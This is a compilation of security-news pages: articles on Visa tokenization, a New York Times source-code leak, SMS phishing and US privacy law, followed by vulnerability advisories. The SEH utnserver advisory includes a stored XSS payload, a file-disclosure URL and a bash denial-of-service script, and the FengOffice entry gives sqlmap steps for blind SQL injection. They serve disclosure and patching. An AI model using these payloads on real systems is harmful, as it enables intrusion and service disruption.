Pseudonymous masking has made credit card transactions more secure, but Visa has even greater plans for tokenization: giving users control of their data.

Source: basiczto via Shutterstock

In 2014, Visa introduced its tokenization service, allowing customers to pay for goods and services without giving away their credit card details.

A decade later, the shift to tokenization has become a great success. The company has issued more than 10 billion tokens, which typically replace a card number in a digital wallet, such as Apple Pay or Google Pay. These tokens — fueled more than $40 billion in e-commerce transactions in the past year, according to Visa, accounting for 29% of all transactions processed by the financial giant. Perhaps even more significantly, tokens see 60% less fraud, leading to the prevention of more than $650 million in fraud in the past year, the company said.

The success is driven by the security technology's ease of use, with digital wallets playing host for most consumers' tokens, says Mark Nelsen, senior vice president and head of consumer platform products for Visa.

"Merchants like it because you get less abandonment, you get higher conversion rate, and, oh, you get lower fraud at the same time," he says. "It seems simple in theory, but there's a lot of technology — as you can imagine — behind the scenes that makes it work at scale."

The tokenization of digital payments has arguably been the greatest success to date for the pseudonymous technology. But the future holds new applications, including the increase of user privacy and the decrease of data loss in case of breach.

**What's Accelerating Tokenization**

In 2020, Visa marked the issuance of its 1 billionth token, a milestone that took six years to reach. Social distancing during the pandemic and consumers' greater comfort with the technology accelerated adoption, leading to 9 billion more tokens created for payment cards in the past four years, according to the financial giant.

The next great push for tokenization will be to improve privacy and data quality, Nelsen says. Passkeys are essentially a tokenization technology that replaces a password with an authentication process using a user's device and, typically, a biometric.

In the future, Visa aims to make tokenization even more widespread, replacing more user data with tokens. The upcoming Visa Token Service can be used to protect nearly any data, including sensitive data, and gives consumers full control over with whom they share their data. At any point in time, the consumer could log into their issuer's banking app, see all of the places where they have shared their data, and revoke some of those permission, Nelsen says.

"Because it's tokenized, they now have life cycle management, and so they could say to the bank, 'Hey, I want to disable or revoke access to my data for these merchants because they don't need to have access to my data anymore,'" he says. "We think it creates a really nice framework for how we could manage data going forward."

The company plans to launch its first Visa Token Service pilots later this year.

**How Tokenization Hides Data**

While tokenization of nonpayment data has gradually grown in popularity, especially as the discipline of data science has taken off over the past decade, managing the process is often complex.

Unlike encryption, tokens can directly replace sensitive data, adhering to the data format so that legacy systems can store the data. Financial institutions, for example, can use tokens to replace credit cards because a 16-digit token can be generated and stored in the place of the 16-digit account number.

A combination of tokenization and encryption can help companies comply with regulations and protect sensitive data, says Brent Johnson, CISO at Bluefin, a data security firm.

"Without an authenticated API to 'detokenize' the data and decode the token, the token is useless to hackers," he says.

**Vaulted or Vaultless Tokenization?**

Most businesses are data pack rats — throwing away perfectly good data is antithesis to their strategy. Yet keeping data around poses risks in the case of a data breach. So companies typically use one of two methods of tokenization: Vaulted systems store the mapping of tokens to data in a vault but allow employees to use the tokenized version, while vaultless systems use an encryption-like mapping that can restore data for authorized users.

There is no reason for companies to leave nontokenized data around, says Todd Moore, global head of data security products at Thales, a data protection firm.

"Tokenization should be a part of an organization's overall security strategy, \[but\] encryption and associated key management remains the best way to protect long-term sensitive data," he says. "Many global privacy regulations recognize the combination of using encryption and tokenization, like pseudonymization, as an adequate form of data protection."

Tokenization should not just be used for databases but also to mask privacy-regulated data with tokenization, which can help companies retain some use of the information while meeting their regulatory obligations, says Bluefin's Johnson.

In fact, by pushing tokenization out to the user's machine, companies can make their data life cycles more secure, he says.

"Companies should ... use tokenization to immediately tokenize data upon entry into a Web form or e-commerce page, further extending its use beyond protecting data in storage," Johnson says. "Vaultless tokenization provides the easiest way to secure an organization's data as most of the organization's systems will never see the original data strings, and only a very few, limited, heavily controlled systems are allowed to transform tokens back to sensitive data."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Tokenization Moves Beyond Payments to Personal Privacy

The tranche of data, lifted from underprotected GitHub repositories, reportedly includes source code, though the country's paper of record has not yet confirmed the nature of the data accessed.

Source: Michele D'Ottavio via Alamy Stock Photo

A 4chan user has leaked 270GB of internal New York Times data — allegedly including source code for the popular Wordle game and other parts of the business — as part of an incident that the media outlet partially confirmed this week.

The anonymous 4chan user claimed to have gained access to 5,000 GitHub repositories, mostly unencrypted, containing a collective 3.6 million files, including "basically all source code belonging to the New York Times Company."

Such claims from cybercriminals should always be taken with a grain of salt. But at least one researcher, Alex Ivanovs, says he has verified part of the data as legitimate, including source code for Wordle; a WordPress database of 1,500 New York Times Education site users with names, email addresses, and hashed passwords; internal Slack communications; and authentication details such as "URLs and their respective passwords, secret keys, and API tokens. … Plenty of such secrets need immediate attention."

For its part, a spokesperson for the Gray Lady confirmed that data was accessed back in January, but didn't verify the granular details of the incident.

“The underlying event related to the recent online posting of Times information occurred in January 2024, when a credential to a cloud-based third-party code platform was inadvertently made available," says Charlie Stadtlander, New York Times managing director for external communications, newsroom, and opinion. "The issue was quickly identified, and we took appropriate measures in response at the time. There is no indication of unauthorized access to Times-owned systems nor impact to our operations related to this event. Our security measures include continuous monitoring for anomalous activity.”

**Source-Code Leaks Have Wide-Ranging Implications**

If the data trove is indeed as extensive as claimed, the ramifications could be significant for the Times itself, as well as for subscribers.

"The very nature of source code means that malicious actors could examine it for vulnerabilities to exploit in cyberattacks," noted Javvad Malik, lead security awareness advocate at KnowBe4, in an emailed statement. "Additionally, the claim that only a small fraction of the repositories were encrypted highlights a potential gap in data protection strategies."

Thomas Richards, principal security consultant at Synopsys, added in an email that the exposure of source code could also allow cybercriminals to tamper with applications, games, and internal infrastructure for use in any number of nefarious attacks.

"What should be sending alarm bells through the NYTimes security team is that someone had a privileged level of access inside their network to even access the source code," he said. "If they were in the network just to view the code, they could also tamper with the code to introduce vulnerabilities or backdoors to allow additional compromise. The NYTimes should do a thorough review of all their source code to make sure it was not tampered with or that unauthorized changes were made."

Even if the data affected is less impacting than many fear, the incident is the latest, along with the recently revealed Ticketmaster breach, to showcase issues in securing third-party cloud assets.

This is a developing story.

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

New York Times Internal Data Nabbed From GitHub

A flaw was found in Keycloak in the OAuth 2.0 Pushed Authorization Requests (PAR). Client provided parameters were found to be included in plain text in the KC_RESTART cookie returned by the authorization server's HTTP response to a request_uri authorization request. This could lead to an information disclosure vulnerability.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-69fp-7c8p-crjr

**Keycloak exposes sensitive information in Pushed Authorization Requests (PAR)**

High severity GitHub Reviewed Published Jun 10, 2024 in keycloak/keycloak • Updated Jun 10, 2024

**Package**

maven org.keycloak:keycloak-services (Maven)

**Affected versions**

< 24.0.5

A flaw was found in Keycloak in the OAuth 2.0 Pushed Authorization Requests (PAR). Client provided parameters were found to be included in plain text in the KC\_RESTART cookie returned by the authorization server's HTTP response to a request\_uri authorization request. This could lead to an information disclosure vulnerability.

**References**

*   GHSA-69fp-7c8p-crjr
*   keycloak/keycloak@2191cc2

Published to the GitHub Advisory Database

Jun 10, 2024

Last updated

Jun 10, 2024

GHSA-69fp-7c8p-crjr: Keycloak exposes sensitive information in Pushed Authorization Requests (PAR)

London cops make arrests in connection with scam SMS messages, purportedly from official organizations, being sent out from bespoke phone mast.

Source: Roger Bamber via Alamy Stock Photo

London police have made two arrests in connection with what the law-enforcement agency claims is a first-of-its-kind crime — bypassing mobile networks' security to send flurries of malicious text messages by standing up a homemade cellphone tower.

Commonly referred to as "smishing," using SMS text messages as phishing lures is nothing new, but the addition of the homemade tower the accused used as a "text message blaster," according to the cops, is a novel approach.

“The criminals committing these types of crimes are only getting smarter, working in more complex ways to trick unknowing members of the public and steal whatever they can get their hands on," said temporary Detective Chief Inspector David Vint, head of the Dedicated Card and Payment Crime Unit (DCPCU), in an announcement of the arrests.

The cybercriminals reportedly sent thousands of text messages posing as banks and other organizations in an attempt to harvest data from victims, the London police explained.

**About the Author(s)**

Smishers Stand Up Fake Phone Tower to Blast Malicious Texts

If passed, APRA will be a giant leap forward for the rights and freedoms of Americans.

Source: imageBROKER.com GmbH & Co. KG via Alamy Stock Photo

COMMENTARY

April 7 was quite a moment for Americans. That was when two US lawmakers shared draft legislation of a soon-to-be unveiled bill called the American Privacy Rights Act, or APRA. According to the International Association of Privacy Professionals (IAPP), if it becomes law, the American Privacy Rights Act "would introduce a significant shift in how organizations collect, process and share personal information, and set a high bar for data minimization practices.

To date, corporate privacy professionals whose operations are in scope of the US have needed to treat the region essentially as 50 countries since, generally, each state has its own set of laws and regulations on the subject. Complex if you deal with one or two states, unmanageable if you deal with 50.

Let's set the scene: The United States has, historically, addressed the privacy of its citizens at the state level, reserving broader rule for specific industries such as medical (HIPAA), financial, and trade (FTC). You quickly can see how this legislative patchwork left significant gaps in the processing of personal data outside very specific use cases. Europe suffered a similar lack of cohesion for many years, until the implementation of the General Data Protection Regulation (GDPR) in 2018, and the world watched closely to see if unified laws spanning dozens of geographies could actually work.

Six years later, it is safe to say that the processing and protection of personal information across Europe is unrecognizable from what it once was, and in the interim period, we've even seen the birth of revolutionary data laws in California and other states. A standard for data subjects' rights and what they expected was emerging in a place where we were generating and using — as well as valuing and relying upon — an exponentially increasing amount of data.

**The US Needs Federal Privacy Laws**

There are a number of reasons why the US wants, and needs, privacy laws at a federal level: consistency, manageability, interstate operability, trade with other regions such as Europe and Australia, and to enable technologies such as open banking to move forward. To date, states including California, Kentucky, Maryland, and others have been left with no choice but to enact local laws in order to compete in a marketplace where data privacy is a key player and differentiator among those vying for business. 

APRA, which at the time of this writing is still in draft form, follows in the footsteps of GDPR and the ePrivacy Directive, with provisions for data processing principles, subject's rights, consent to marketing, and data security.

This is still very early days, and in addition to the unclear timing (typically, an election year would preclude these types of proposals), there are more than a few obstacles still to overcome, including the same challenges that were evident in 2022, such as state law preemption and Private Right of Action.

Relevant stakeholders (think big tech, privacy groups, state governors, etc.) will each have their own perspectives, priorities, and questions, all of which will take time to come to an agreement on, if at all possible. It's worth noting that, unlike legislation in other countries, APRA attempts to consider both the interests of the data subject as well as those of the business and its operational abilities. This is untested waters, though, so it will be very interesting to see if, and how, that would work in real life.

In summary, APRA is a giant leap forward for the rights and freedoms of American subjects. I know we have been here before (two years ago), but this feels different — with people reenergized, reinvigorated, and excited by it. US lawmakers will be feeling pressure from different angles, not least from large enterprises that are losing opportunities to other regions where legislation enforces the notion of putting personal information front and center. Watch this space: I think good things are coming.

**About the Author(s)**

Group Data Protection Officer, GlobalSign

Richard Hancock is Group Data Protection Officer of GlobalSign, where he utilizes a strong technical background to provide clear and practical steer and guidance in addressing problems with a long, proven track record of creating, implementing, managing and reviewing data protection programs and framework, aligning with industry standards, and meeting a plethora of ever changing, culturally different global legislative landscapes. He spent many years helping enterprises implement PKI solutions, ranging from 1 or 2 SSL certificates through to custom-written API modules for automated process handling. Over the past decade, he has used that skill set to develop and implement data governance regime and data protection legislation compliance, encompassing not just General Data Protection Regulation (GDPR) and ePrivacy but also many domestic laws, as well as both federal and state level regulations within the US. He continues to lead the way in strategic thinking and best practice deployment in the identity verification, digital signing, and data encryption sector.

Is a US Nationwide Privacy Law Really Coming?

The threat environment will continue to grow in complexity. Now is the time for organizations to streamline how they manage and mitigate overlooked vulnerabilities.

Source: Stephen Parker via Alamy Stock Photo

According to Coalition's research, Common Vulnerabilities and Exposures (CVEs) are expected to increase by 25% in 2024 to a shocking height of 34,888 vulnerabilities, or roughly 2,900 per month. As attack surfaces continue to expand rapidly, business leaders face mission-critical choices in increasing their cyber defenses to improve vulnerability warning, patch management, and incident response.

Through our honeypot data and view into our cyber insurance policyholders' attack surfaces, security tools, and workflows, Coalition has identified the key technology choices that place businesses at risk — as well as the choices that are proving most effective.

**Short-Sighted Business Choices**

Several factors contribute to the current state of weak vulnerability management, making organizations more susceptible to cyberattacks.

First, companies often leave security teams under-resourced and overworked. These cyber workforce challenges — from worker shortages and cyber skill gaps to security burnout — continue weighing down security teams. Information security professionals are enduring extreme alert fatigue, inhibiting their ability to quickly track, patch, and remediate vulnerabilities.

Second, choosing to use disparate flagging systems keeps critical information on the latest threats siloed. Companies and their customers are at risk because key resources are managed separately: The National Institute of Standards and Technology's (NIST) Common Vulnerability Scoring System (CVSS) scores, the Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) Catalog, and miscellaneous (and often belated) security advisories from vendors all come from distinct sources. The onus then is transferred to each organization to stay on top of all these different information sources. Worse, now that NIST is facing major backlog issues, its National Vulnerability Database can no longer be seen as a source of truth, complicating the picture further.

Third, companies don't always put business resources into closing the talent gap. ISC2 found that while the cybersecurity workforce grew 8.7% year over year in 2023, the workforce gap grew an additional 12.6%. Supply is outpacing demand, and security teams are simply strapped.

Finally, choosing to ignore technical debt keeps old and outdated software a high-risk target. Legacy technologies and companies' massive lists of technology subscriptions not only take up security budgets, but they also expand businesses' attack surfaces. Many businesses don't have the budget to explore new security tools or approaches because they are weighed down by technical debt.

**Risky Technical Choices**

Security teams must make smarter choices about the overlooked risks threat actors continue to successfully target and exploit year after year: unpatched vulnerabilities, Internet-exposed technologies, and end-of-life (EOL) technology.

First, understand that vulnerabilities can turn seemingly small software flaws into active attacks, so putting off patching is a risky decision. In a recent example, a nation-state attack from a North Korean threat group targeted a Windows zero-day vulnerability left unpatched for six months. This vulnerability's scale and business impacts are still unknown but pose a massive, ongoing risk for organizations.

Second, organizations need to pay more attention to their easily exploitable, Internet-exposed technologies. For example, Coalition found scans from unique IP addresses looking for Remote Desktop Protocol (RDP) increased by 59% from January 2023 to October 2023, indicating that cybercriminals are still targeting this vulnerable technology to gain operating system access.

Finally, companies often decide to keep outdated and EOL technologies running until they break down completely — or get penetrated. Threat actors upped their attacks on outdated, out-of-date software this last year. Coalition's report found that 10,000 businesses are running EOL database Microsoft SQL Server 2000, while over 100,000 businesses are running EOL Microsoft SQL servers. If left unaddressed, outdated technology and technical debt will cost organizations in the US trillions of dollars in the coming years.

As threat actors continue to search for the easiest risks to exploit and monetize, strengthening an organization's cyber resilience can be as simple as identifying the most easily addressable risks.

**Smarter Choices for Security Teams**

Our research shows that choosing to implement a few leading solutions improves vulnerability management and will continue to do so in the foreseeable future.

First, security professionals can leverage threat intelligence tools, like honeypots, to identify hackers' tactics, techniques, and procedures. These tools help serve as an early warning system for new threats. For example, Coalition uncovered cybercriminal activity related to the 1,000% 2023 MOVEit vulnerability spike in mid-May, two weeks before Progress Software and CISA issued their advisories. This early alerting helped our policyholders remediate the vulnerability and avoid related cyber incidents and impending cyber insurance claims. Meanwhile, the vulnerability cost the broader cyber ecosystem $15.6 billion.

Second, defenders should employ artificial intelligence (AI) to help them generate and contextualize alerts across the security ecosystem. While the cyber industry works to overcome the cybersecurity risks of AI, vendors are also finding new ways to battle adversaries with the technology. For example, Coalition's Exploit Scoring System incorporates multiple data sets and analyzes them with AI to help companies manage and prioritize risk mitigation.

Finally, remember to pair continuous threat detection and response management with a human traffic guard. The human power of security teams will lift cogent businesses over risky ones. While AI and machine learning are key to catching vulnerabilities, patching with intelligence requires people — strategic human partners who can act on the AI's automated insights.

**About the Author(s)**

Vice President of Research, Coalition

Tiago Henriques has had a rich career across the cybersecurity industry as an entrepreneur, CEO, pen tester, security analyst and auditor. In 2015 he founded BinaryEdge, a cybersecurity company specializing in enterprise infrastructure scanning and attack surface management. Since Coalition's acquisition of BinaryEdge in 2020, Tiago led customer security efforts across the organization as Director of Engineering for Security, recently becoming Vice President of Research.

Making Choices that Lead to Stronger Vulnerability Management

Kiuwan SAST versions prior to 2.8.2402.3, Kiuwan Local Analyzer versions prior to master.1808.p685.q13371, and Kiuwan SaaS versions prior to 2024-02-05 suffer from XML external entity injection, cross site scripting, insecure direct object reference, and various other vulnerabilities.

Kiuwan Local Analyzer / SAST / SaaS XML Injection / XSS / IDOR

SEH utnserver Pro/ProMAX and INU-100 version 20.1.22 suffers from cross site scripting, denial of service, and file disclosure vulnerabilities.

CyberDanube Security Research 20240604-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities  
              product| SEH utnserver Pro/ProMAX / INU-100  
   vulnerable version| 20.1.22  
        fixed version| 20.1.28  
           CVE number| CVE-2024-5420, CVE-2024-5421, CVE-2024-5422  
               impact| High  
             homepage| https://www.seh-technology.com/  
                found| 2024-03-04  
                   by| T. Weber (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"We are SEH from Bielefeld - manufacturer of high-quality network solutions.  
With over 35 years of experience in the fields of printing and networks, we  
offer our customers a broad and high-level expertise in solutions for all types  
of business environments."

Source: https://www.seh-technology.com/us/company/about-us.html

Vulnerable versions  
-------------------------------------------------------------------------------  
utnserver Pro / 20.1.22  
utnserver ProMAX / 20.1.22  
INU-100 / 20.1.22

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Stored Cross-Site Scripting (CVE-2024-5420)  
A Stored Cross-Site Scripting vulnerability was identified in the web interface  
of the device. Multiple parameters, e.g. the device description, can be abused  
to inject JavaScript code. An attacker can exploit this vulnerability by luring  
a victim to visit a malicious website. Furthermore, it is possible to hijack  
the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)  
Files and content of directories can be disclosed by integrated functions of  
the device.

3) Denial of Service (CVE-2024-5422)  
A Denial-of-Service vulnerability has been identified in the web interface of  
the device. This can be triggered by sending a lot of requests that trigger  
serial interface access on the device.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Stored Cross-Site Scripting (CVE-2024-5420)  
By accessing to the following URL, an attacker can modify the device  
description:  
http://$IP/device/description_en.html

By using malicious JavaScript payload, it is possible to execute arbitrary  
code. This snippet demonstrates such a payload:  
"><script>alert(document.location)</script>

Saving this text to the device description leads to a persistent cross-site  
scripting. Therefore, everyone who openes the device description executes the  
injected code in the context of the own browser.

2) Authenticated File Disclosure (CVE-2024-5421)  
A hidden function in the web-interface of the device can be used to disclose  
directories and files on operating system level. The function can be accessed  
directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)  
For triggering a denial of service on the device, multiple file descriptors  
are opened by using the following script:  
-------------------------------------------------------------------------------  
#!/bin/bash  
echo "Parameters: $1 $2"  
last_iter=$(($2 - 1))  
for ((i=1; i<=$2; i++))  
    do  
    echo "[$i] Downloading application binary"  
    if [[ "$i" == "$last_iter" ]];then  
        curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null  
    else  
        curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &  
    fi  
done  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround  
-------------------------------------------------------------------------------  
None

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to  
the latest version available.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent  
            advisory to support.  
2024-03-20: Asked for an update. Contact stated, that an internal timeline will  
            be defined.  
2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will  
            be patched soon.  
2024-04-16: Contact sent link to patched firmware release candidate.  
2024-05-31: Notified SEH Computertechnik that advisory will be released first  
            week of June. Received confirmation from SEH Computertechnik.  
2024-06-04: Coordinated release of security advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF T. Weber / @2024

SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure

The call for papers for Hardwear.io 2024 in the Netherlands is now open. It will take place October 24th through the 24th, 2024 at the Marriott Hotel, Amsterdam, The Netherlands.

    *Conference Name: *Hardwear.io Netherlands 2024*Important Dates:**CFP Deadline: *10th August 2024*Conference Dates: *24th-25th October 2024*Venue: *Marriott Hotel, Amsterdam, The Netherlands*Website Link: *https://hardwear.io/netherlands-2024/cfp.phpWelcome to the 10th edition of Hardwear.io Netherlands 2024!Are you someone who has expertise in hardware security? Then, we've got youcovered, hardwear.io is a platform where researchers showcase and discusstheir innovative findings on attacking and defending hardware.>> Call For Papers (CFP) OPEN> Submission TopicsWe are interested in new and cutting-edge security work that has previouslynot been published. Some security topics for your reference include (butare not limited to):Integrated Circuits | Processors | Internet of Things / Smart Devices |Embedded Systems & Cryptography | Automobile, Aeroplane, Train AutomationSystems and Hardware Components | Industrial Control Systems / SCADA |Satellite Systems | Medical Devices> Submission CategoriesNew Research Category: A deep knowledge technical track that includes newresearch, vulnerabilities, zero days, or exploits. And by new we reallymean new i.e. if your research or talk has been published/showcased(partially or entirely) before, it will fall under the current researchcategory even though there are enhancements/changes to the originalresearch.Current Research and Workshop Category: Comprises known security issues,research presented/published elsewhere, case studies, twist to existingresearch, vulnerability, exploit, or research-in-progress.Tool Category: Comprises open-source security tools, exploits, hardware,etc. This is an excellent opportunity for the original authors to showcasetheir work to the world.> Speaker Benefits as per each research category:https://hardwear.io/netherlands-2024/cfp.phpReach out to cfp@hardwear.io for any further questions. Thank you!

Hardwear.io NL 2024 Call For Papers

FengOffice version 3.11.1.2 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: FengOffice - Blind SQL Injection# Date: 06/2024# Exploit Author: Andrey Stoykov# Version: 3.11.1.2# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.htmlSteps to Reproduce:   1. Login to application   2. Click on "Workspaces"   3. Copy full URL   4. Paste the HTTP GET request into text file   5. Set the injection point to be in the "dim" parameter value   6. Use SQLMap to automate the processsqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim--fingerprint[...][12:13:03] [INFO] confirming MySQL[12:13:04] [INFO] the back-end DBMS is MySQL[12:13:04] [INFO] actively fingerprinting MySQL[12:13:05] [INFO] executing MySQL comment injection fingerprintweb application technology: Apacheback-end DBMS: active fingerprint: MySQL >= 5.7               comment injection fingerprint: MySQL 5.7.37[...]

Tag

#auth